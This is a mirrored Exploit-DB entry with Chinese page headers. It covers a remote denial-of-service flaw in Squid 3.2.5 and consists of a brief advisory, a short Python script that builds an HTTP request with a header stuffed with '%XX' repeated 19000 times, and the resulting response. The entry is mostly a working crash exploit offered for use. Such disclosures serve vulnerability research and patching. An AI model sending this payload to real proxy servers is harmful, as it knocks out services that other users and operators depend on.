Squid – ‘httpMakeVaryMark()’ Remote Denial of Service - 体验盒子

作者： tytusromekiatomek

日期： 2013-03-05

类别：

dos

平台：

linux

来源：https://www.exploit-db.com/exploits/38365/

source: https://www.securityfocus.com/bid/58319/info

Squid is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.

Squid 3.2.5 is vulnerable; other versions may also be affected. 

Request
-- cut --
#!/usr/bin/env python
print 'GET /index.html HTTP/1.1'
print 'Host: localhost'
print 'X-HEADSHOT: ' + '%XX' * 19000
print '\r\n\r\n'
-- cut --

Response
-- cut --
HTTP/1.1 200 OK
Vary: X-HEADSHOT
-- cut --